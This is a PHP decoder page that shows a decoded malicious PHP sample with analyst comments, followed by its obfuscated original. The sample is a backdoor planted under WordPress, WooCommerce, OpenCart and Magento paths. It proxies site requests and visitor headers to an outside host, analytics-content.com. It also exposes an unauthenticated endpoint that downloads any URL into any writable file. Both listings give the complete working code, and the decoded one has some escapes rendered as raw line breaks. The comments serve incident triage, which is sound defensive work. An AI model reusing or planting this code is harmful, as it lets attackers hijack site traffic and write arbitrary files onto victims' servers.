PHP Decode
<?php goto CVHd5; AOPlP: function decode_chunked($str) { for ($res = ''; !empty($str); $st..
Decoded Output download
<?php
/*
 * Analyst notes on the decoded sample (code tokens below are unchanged).
 *
 * What the visible code does:
 *   - Acts as a reverse proxy: each GET request is re-issued over TLS to the
 *     host held in $dest, and the upstream status line, headers and body are
 *     replayed to the visitor as if they came from this site.
 *   - Exposes an unauthenticated fetch-and-write endpoint (download()).
 *   - Caches raw upstream responses in a Memcache instance on localhost when
 *     the extension is available.
 *   - Sends rejected or failed requests to https://google.com via bad_request().
 *
 * Control flow: the goto labels only reorder the file. Execution order is
 *   CVHd5 -> gACCD -> WkZD5 -> a3y0r -> XEkVA -> cdzZ2 -> nzCcq -> s3Oc0
 *   -> AOPlP -> IJ0Wg -> nskIS -> IjUdl.
 *
 * Triage pointers taken from this listing: the request paths in $routing, the
 * hostname in $dest (outbound TLS on port 443 from the web server), the query
 * parameters `download`, `s`, `d`, `path` and `cache`, and the `/html/liveness`
 * probe that answers "OK".
 *
 * Rendering caveat: the decoder appears to have emitted some CR/LF escapes as
 * raw bytes, so several string literals below span physical lines. The escaped
 * spelling in the "Original Code" listing (for example "\15\12") is the
 * authoritative form of those delimiters.
 */
goto CVHd5;
// Reassembles a chunked-transfer body: reads the hex chunk length up to the
// first CR LF, appends that many bytes to $res, drops them from $str, and
// repeats until the trimmed remainder is empty.
AOPlP: function decode_chunked($str) { for ($res = ''; !empty($str); $str = trim($str)) { $pos = strpos($str, "\xd
"); $len = hexdec(substr($str, 0, $pos)); $res .= substr($str, $pos + 2, $len); $str = substr($str, $pos + 2 + $len); } return $res; } goto IJ0Wg;
// Cache read. Returns null when the Memcache class is missing, the connection
// to localhost fails (the warning is suppressed with @), or the stored value is
// falsy.
cdzZ2: function get_from_cache($name) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $result = $memcache->get($name); if ($result) { return $result; } } } return null; } goto nzCcq;
// Chooses the address reported upstream: X-Forwarded-For, then Client-IP, then
// REMOTE_ADDR. The first two are request headers, so the value is whatever the
// client supplied.
a3y0r: function get_ip_address() { $ip = ''; if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { if (isset($_SERVER["HTTP_CLIENT_IP"])) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } else { $ip = $_SERVER["REMOTE_ADDR"]; } } return $ip; } goto XEkVA;
// Fetch-and-write endpoint. With both `s` and `d` present it retrieves URL `s`
// with cURL and streams the body into path `d` (opened "w+", so an existing
// file is truncated). Without them it prints this script's directory.
// Nothing in this function restricts the URL, the destination path or the
// caller, and the fopen() result is not checked. For incident response this
// means files writable by the web-server account cannot be trusted on a host
// where this script was reachable.
IJ0Wg: function download() { if (isset($_GET["s"]) and isset($_GET["d"])) { $file_url = urldecode($_GET["s"]); $destination_path = urldecode($_GET["d"]); $fp = fopen($destination_path, "w+"); $ch = curl_init($file_url); curl_setopt($ch, CURLOPT_FILE, $fp); curl_exec($ch); $st_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if ($st_code == 200) { echo "File downloaded successfully!"; } else { echo "Error downloading file!"; } } else { echo dirname(__FILE__); } } goto nskIS;
// Path fragments removed from the request path before it is forwarded.
// NOTE(review): these look like the URLs this script is planted under on
// WordPress/WooCommerce, OpenCart and Magento installs; confirm against the
// affected site before using them as indicators.
CVHd5: $routing = array("/wp-content/plugins/woocommerce/vendor/loader.php" => '', "/wp-content/plugins/woocommerce/loader.php" => '', "/wp-includes/analytics.php" => '', "/catalog/view/theme/default/stylesheet/joseanmatias_parcelamento_desconto.php" => '', "/pub/errors/analytics.php" => '', "/analytics" => ''); goto gACCD;
// Cache eviction: deletes $name from Memcache on localhost, silently doing
// nothing when the class or the connection is unavailable.
s3Oc0: function remove_in_cache($name) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $memcache->delete($name); } } } goto AOPlP;
// Main request handler.
nskIS: try {
// Only GET is served; any other method is redirected by bad_request().
if ($_SERVER["REQUEST_METHOD"] !== "GET") { bad_request(); }
// The mere presence of a `download` query parameter routes to download().
if (isset($_GET["download"])) { download(); die; }
// The path is taken from REQUEST_URI; an empty URL or a bare "/" is rejected.
$url = $_SERVER["REQUEST_URI"]; if (!isset($url) || $url == '') { bad_request(); } $url = parse_url($url); $path = $url["path"]; 
if (!isset($path) || $path == "/") { bad_request(); }
// A `path` query parameter overrides the URL path, and `cache=clear` asks for
// the cached copy to be evicted. The remaining parameters are re-encoded and
// forwarded.
$query = ''; $clear = false; if (isset($url["query"])) { parse_str($url["query"], $params); if (isset($params["path"])) { $path = $params["path"]; unset($params["path"]); } if (isset($params["cache"]) && $params["cache"] == "clear") { $clear = true; } $query = http_build_query($params); }
// Strip every $routing fragment that occurs in the path.
foreach ($routing as $key => $value) { if (strpos($path, $key) !== false) { $path = str_replace($key, $value, $path); } }
// Liveness probe: answered locally with "OK", no upstream contact.
if ($path == "/html/liveness") { echo "OK"; die(1); } if ($clear) { remove_in_cache($path); }
// Cache lookup is keyed by $path alone; the query string is not part of the key.
$cached = true; $response = get_from_cache($path); if (!isset($response)) { $cached = false;
// Cache miss: open a TLS socket to $dest on port 443 with a 5 second timeout.
// The error string is captured in $mesage but the die() call interpolates
// $message, which is never assigned in the visible code.
$fp = fsockopen("ssl://" . $dest, 443, $code, $mesage, 5); if (!$fp) { die("{$code} ({$message})"); }
// Request line, Host and X-Forwarded-For are written first; every other
// incoming header with a non-empty value is then relayed as received.
fputs($fp, "GET " . $path . "?" . $query . " HTTP/1.1
"); fputs($fp, "Host: " . $dest . "\xd\xa"); fputs($fp, "X-Forwarded-For: " . get_ip_address() . "
"); foreach (apache_request_headers() as $header => $value) { if (strcasecmp($header, "Host") !== 0 && strcasecmp($header, "X-Forwarded-For") !== 0) { if (isset($value) && strlen($value) > 0) { fputs($fp, $header . ": " . $value . "\xd\xa"); } } } fputs($fp, "Connection: close
\xa
\xa");
// Read the whole upstream response (status line, headers and body) into
// $response.
while (!feof($fp)) { $response .= fgets($fp, 1024); } fclose($fp); }
// Split head from body at the first blank line; a response without one is
// treated as a failure.
$result = explode("\xd\xa\xd
", $response, 2); if (!isset($result[0]) || !isset($result[1])) { bad_request(); }
// Headers already queued by PHP or the host application are discarded so that
// only the upstream's header lines reach the visitor.
if (!headers_sent()) { header_remove(); }
$headers = explode("
\xa", $result[0]); $cache = 0; $is_gzip = false; $is_chunked = false;
// Replay each upstream header line with header(). Lines containing "Connection"
// or "Date" are dropped; the exact gzip and chunked lines are consumed here
// because the body is decoded locally before being echoed. On a fresh fetch,
// "Cache-Control: public,max-age=N" supplies the cache lifetime. A line
// containing "404 Not Found" ends the request after that line is sent.
foreach ($headers as $headerLine) { if (strpos($headerLine, "Connection") !== false) { continue; } if (strpos($headerLine, "Date") !== false) { continue; } if ($headerLine == "Content-Encoding: gzip") { $is_gzip = true; continue; } if ($headerLine == "Transfer-Encoding: chunked") { $is_chunked = true; continue; } if ($cached !== true && strpos($headerLine, "Cache-Control: public,max-age=") !== false) { $cache = intval(str_replace("Cache-Control: public,max-age=", '', $headerLine)); } header($headerLine, true); if (strpos($headerLine, "404 Not Found") !== false) { die; } }
// The raw response, headers included, is what gets cached under $path.
if ($cache > 0) { set_to_cache($path, $response, $cache); }
// Undo chunking and gzip, then emit the upstream body to the visitor.
$contents = $result[1]; if ($is_chunked) { $contents = decode_chunked($contents); } if ($is_gzip) { $contents = gzdecode($contents); } echo $contents;
// Any Exception ends in the same redirect as a rejected request.
} catch (Exception $e) { bad_request(); } goto IjUdl;
// Cache write: stores $value under $name with flags 0 and lifetime $expired,
// best-effort like the other cache helpers.
nzCcq: function set_to_cache($name, $value, $expired) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $memcache->set($name, $value, 0, $expired); } } } goto s3Oc0;
// Fallback for servers without apache_request_headers(): rebuilds header names
// from the HTTP_* keys of $_SERVER by removing the prefix, splitting on "_",
// applying ucfirst() to each part and joining the parts with "-".
WkZD5: if (!function_exists("apache_request_headers")) { function apache_request_headers() { $arh = array(); $rx_http = "/\AHTTP_/"; foreach ($_SERVER as $key => $val) { if (preg_match($rx_http, $key)) { $arh_key = preg_replace($rx_http, '', $key); $rx_matches = array(); $rx_matches = explode("_", $arh_key); if (count($rx_matches) > 0 and strlen($arh_key) > 2) { foreach ($rx_matches as $ak_key => $ak_val) { $rx_matches[$ak_key] = ucfirst($ak_val); } $arh_key = implode("-", $rx_matches); } $arh[$arh_key] = $val; } } return $arh; } } goto a3y0r;
// Common exit for rejected or failed requests: redirect to https://google.com
// and stop.
XEkVA: function bad_request() { header("Location: https://google.com"); die; } goto cdzZ2;
// Upstream host that every proxied request is sent to. Outbound connections
// from the web server to this name are a network-side indicator.
gACCD: $dest = "analytics-content.com"; goto WkZD5;
// End of the goto chain.
IjUdl:
?>
Original Code
<?php
/*
 * Obfuscated form of the sample, as submitted to the decoder.
 *
 * Two techniques are visible here and nothing else:
 *   1. The top-level statements and function definitions are shuffled and
 *      stitched back together with goto labels (CVHd5, gACCD, WkZD5, ...).
 *   2. String literals are spelled with mixed octal and hex escapes, e.g.
 *      "\115\x65\x6d\143\141\x63\150\x65" is "Memcache".
 *
 * The listing contains no eval or other runtime decoding stage, so every
 * string can be recovered by static unescaping. Function, variable and label
 * names are left in clear text and are therefore stable across this encoding,
 * whereas the escaped spelling of the strings may differ between copies.
 */
goto CVHd5; AOPlP: function decode_chunked($str) { for ($res = ''; !empty($str); $str = trim($str)) { $pos = strpos($str, "\xd\12"); $len = hexdec(substr($str, 0, $pos)); $res .= substr($str, $pos + 2, $len); $str = substr($str, $pos + 2 + $len); } return $res; } goto IJ0Wg; cdzZ2: function get_from_cache($name) { if (class_exists("\115\x65\x6d\143\141\x63\150\x65")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\x6c\x6f\143\x61\154\x68\157\x73\x74"); if ($isAvailable) { $result = $memcache->get($name); if ($result) { return $result; } } } return null; } goto nzCcq; a3y0r: function get_ip_address() { $ip = ''; if (isset($_SERVER["\110\124\x54\x50\x5f\x58\137\106\x4f\122\x57\101\x52\x44\x45\x44\x5f\x46\117\122"])) { $ip = $_SERVER["\110\124\124\x50\137\130\x5f\x46\117\x52\127\101\122\104\105\x44\x5f\106\x4f\x52"]; } else { if (isset($_SERVER["\110\124\x54\x50\137\x43\x4c\x49\x45\x4e\x54\137\x49\120"])) { $ip = $_SERVER["\x48\x54\x54\x50\x5f\103\114\x49\x45\x4e\x54\x5f\x49\120"]; } else { $ip = $_SERVER["\122\105\x4d\x4f\124\105\x5f\x41\x44\x44\x52"]; } } return $ip; } goto XEkVA; IJ0Wg: function download() { if (isset($_GET["\163"]) and isset($_GET["\x64"])) { $file_url = urldecode($_GET["\163"]); $destination_path = urldecode($_GET["\144"]); $fp = fopen($destination_path, "\x77\53"); $ch = curl_init($file_url); curl_setopt($ch, CURLOPT_FILE, $fp); curl_exec($ch); $st_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if ($st_code == 200) { echo "\106\151\154\x65\x20\144\x6f\x77\156\x6c\x6f\x61\144\x65\144\40\163\165\x63\143\145\x73\x73\146\x75\x6c\x6c\171\x21"; } else { echo "\x45\x72\162\157\162\40\144\x6f\167\156\154\x6f\x61\x64\x69\x6e\147\x20\x66\x69\154\x65\x21"; } } else { echo dirname(__FILE__); } } goto nskIS; CVHd5: $routing = 
array("\x2f\x77\x70\x2d\143\157\156\x74\145\156\164\57\x70\154\165\x67\151\156\163\57\167\x6f\157\x63\157\x6d\155\x65\162\x63\145\57\166\x65\156\x64\x6f\162\57\154\x6f\x61\x64\x65\x72\x2e\x70\x68\x70" => '', "\57\x77\160\55\x63\157\156\164\145\156\x74\x2f\x70\x6c\165\147\151\x6e\x73\x2f\167\x6f\157\143\157\x6d\x6d\x65\162\x63\x65\57\154\x6f\x61\x64\x65\162\56\160\150\x70" => '', "\57\167\160\x2d\151\156\143\154\165\x64\x65\x73\x2f\x61\x6e\141\x6c\171\164\x69\x63\163\x2e\x70\x68\160" => '', "\x2f\143\141\x74\141\154\x6f\147\57\x76\x69\145\x77\57\x74\x68\145\x6d\145\57\144\x65\146\141\x75\x6c\x74\x2f\163\x74\x79\154\x65\163\150\145\x65\x74\x2f\152\x6f\163\145\x61\x6e\x6d\141\x74\x69\141\163\x5f\x70\141\162\x63\x65\x6c\141\155\x65\x6e\164\x6f\137\x64\x65\163\x63\x6f\x6e\x74\157\x2e\x70\150\x70" => '', "\x2f\160\165\142\x2f\145\x72\162\x6f\162\x73\57\x61\x6e\141\x6c\171\164\x69\x63\163\56\x70\150\x70" => '', "\57\x61\156\x61\x6c\x79\x74\x69\x63\x73" => ''); goto gACCD; s3Oc0: function remove_in_cache($name) { if (class_exists("\x4d\x65\x6d\143\141\x63\150\x65")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\x6c\x6f\x63\141\x6c\150\157\x73\x74"); if ($isAvailable) { $memcache->delete($name); } } } goto AOPlP; nskIS: try { if ($_SERVER["\x52\x45\121\125\x45\x53\x54\137\x4d\105\124\x48\x4f\x44"] !== "\x47\x45\124") { bad_request(); } if (isset($_GET["\x64\x6f\x77\x6e\x6c\157\x61\x64"])) { download(); die; } $url = $_SERVER["\x52\105\x51\x55\105\123\124\137\x55\122\111"]; if (!isset($url) || $url == '') { bad_request(); } $url = parse_url($url); $path = $url["\160\141\x74\x68"]; if (!isset($path) || $path == "\57") { bad_request(); } $query = ''; $clear = false; if (isset($url["\161\165\x65\162\x79"])) { parse_str($url["\161\165\145\x72\x79"], $params); if (isset($params["\160\141\164\x68"])) { $path = $params["\160\x61\164\150"]; unset($params["\160\141\x74\x68"]); } if (isset($params["\x63\x61\143\150\145"]) && $params["\143\x61\143\150\x65"] == 
"\x63\154\145\x61\x72") { $clear = true; } $query = http_build_query($params); } foreach ($routing as $key => $value) { if (strpos($path, $key) !== false) { $path = str_replace($key, $value, $path); } } if ($path == "\x2f\x68\x74\x6d\154\x2f\x6c\151\166\145\x6e\145\x73\163") { echo "\117\113"; die(1); } if ($clear) { remove_in_cache($path); } $cached = true; $response = get_from_cache($path); if (!isset($response)) { $cached = false; $fp = fsockopen("\x73\x73\x6c\72\57\x2f" . $dest, 443, $code, $mesage, 5); if (!$fp) { die("{$code}\40\x28{$message}\x29"); } fputs($fp, "\x47\105\x54\x20" . $path . "\77" . $query . "\x20\x48\124\x54\120\57\x31\x2e\x31\15\12"); fputs($fp, "\x48\157\x73\164\x3a\40" . $dest . "\xd\xa"); fputs($fp, "\x58\x2d\106\x6f\x72\x77\x61\x72\x64\145\x64\55\x46\x6f\162\x3a\40" . get_ip_address() . "\15\12"); foreach (apache_request_headers() as $header => $value) { if (strcasecmp($header, "\110\x6f\163\x74") !== 0 && strcasecmp($header, "\130\55\x46\157\162\x77\141\162\x64\x65\144\55\x46\x6f\162") !== 0) { if (isset($value) && strlen($value) > 0) { fputs($fp, $header . "\72\40" . $value . 
"\xd\xa"); } } } fputs($fp, "\103\x6f\156\156\x65\143\x74\x69\157\156\x3a\40\x63\154\x6f\x73\145\15\xa\15\xa"); while (!feof($fp)) { $response .= fgets($fp, 1024); } fclose($fp); } $result = explode("\xd\xa\xd\12", $response, 2); if (!isset($result[0]) || !isset($result[1])) { bad_request(); } if (!headers_sent()) { header_remove(); } $headers = explode("\15\xa", $result[0]); $cache = 0; $is_gzip = false; $is_chunked = false; foreach ($headers as $headerLine) { if (strpos($headerLine, "\x43\157\x6e\156\145\143\164\151\x6f\x6e") !== false) { continue; } if (strpos($headerLine, "\x44\141\x74\145") !== false) { continue; } if ($headerLine == "\103\157\x6e\164\x65\156\164\x2d\105\x6e\143\x6f\144\x69\156\147\x3a\x20\x67\x7a\151\160") { $is_gzip = true; continue; } if ($headerLine == "\x54\162\x61\156\163\x66\145\162\x2d\105\x6e\x63\x6f\144\x69\156\x67\72\40\x63\150\x75\156\x6b\x65\x64") { $is_chunked = true; continue; } if ($cached !== true && strpos($headerLine, "\x43\x61\x63\150\145\55\103\x6f\156\x74\162\x6f\x6c\72\40\x70\165\x62\154\151\143\x2c\x6d\x61\170\x2d\x61\147\x65\x3d") !== false) { $cache = intval(str_replace("\103\x61\x63\x68\x65\x2d\103\157\x6e\164\162\x6f\x6c\x3a\x20\x70\x75\x62\x6c\151\x63\x2c\x6d\x61\170\x2d\141\147\x65\x3d", '', $headerLine)); } header($headerLine, true); if (strpos($headerLine, "\64\x30\64\40\x4e\157\164\40\x46\x6f\x75\156\144") !== false) { die; } } if ($cache > 0) { set_to_cache($path, $response, $cache); } $contents = $result[1]; if ($is_chunked) { $contents = decode_chunked($contents); } if ($is_gzip) { $contents = gzdecode($contents); } echo $contents; } catch (Exception $e) { bad_request(); } goto IjUdl; nzCcq: function set_to_cache($name, $value, $expired) { if (class_exists("\115\145\x6d\143\x61\143\x68\x65")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\x6c\157\143\x61\x6c\150\157\x73\164"); if ($isAvailable) { $memcache->set($name, $value, 0, $expired); } } } goto s3Oc0; WkZD5: if 
(!function_exists("\141\160\x61\143\x68\145\137\x72\145\161\165\x65\163\164\x5f\150\x65\141\144\x65\162\163")) { function apache_request_headers() { $arh = array(); $rx_http = "\57\134\x41\110\x54\124\120\137\57"; foreach ($_SERVER as $key => $val) { if (preg_match($rx_http, $key)) { $arh_key = preg_replace($rx_http, '', $key); $rx_matches = array(); $rx_matches = explode("\x5f", $arh_key); if (count($rx_matches) > 0 and strlen($arh_key) > 2) { foreach ($rx_matches as $ak_key => $ak_val) { $rx_matches[$ak_key] = ucfirst($ak_val); } $arh_key = implode("\55", $rx_matches); } $arh[$arh_key] = $val; } } return $arh; } } goto a3y0r; XEkVA: function bad_request() { header("\x4c\x6f\143\x61\x74\151\157\156\72\40\150\164\x74\160\x73\72\x2f\57\x67\x6f\x6f\x67\154\145\56\x63\157\x6d"); die; } goto cdzZ2; gACCD: $dest = "\141\x6e\x61\x6c\171\x74\x69\143\x73\55\x63\157\156\x74\x65\x6e\x74\x2e\143\x6f\155"; goto WkZD5; IjUdl:
Function Calls
None |
Stats
MD5 | 4949fa424964d801fdaf463553fde050 |
Eval Count | 0 |
Decode Time | 59 ms |